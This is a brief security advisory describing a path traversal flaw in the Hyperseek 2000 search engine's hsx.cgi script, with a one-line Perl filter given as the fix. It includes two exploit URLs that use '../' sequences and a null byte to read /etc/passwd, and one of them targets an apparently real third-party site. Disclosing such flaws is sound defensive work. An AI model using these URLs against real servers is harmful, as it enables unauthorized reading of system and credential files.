COMMAND

    Hyperseek

SYSTEMS AFFECTED

    Hyperseek 2000 Search Engine

PROBLEM

    MC GaN (NerF security  gr0up advisory) found following.   Standard
    perl problem is in statistic  module - file: hsx.cgi, script  does
    not filter ../ and %00.   Through this bug, you can remotely  read
    any file and  make listing of  directory. ../ -  directory up, %00
    hex symbol, that means end of line.

    Exploit url:

        http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
        http://www.netsurprise.de/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00

    Note: directory can change and amount of ../ can vary.

SOLUTION

    Filter symbols like:

        $dat=~ s/\0//g;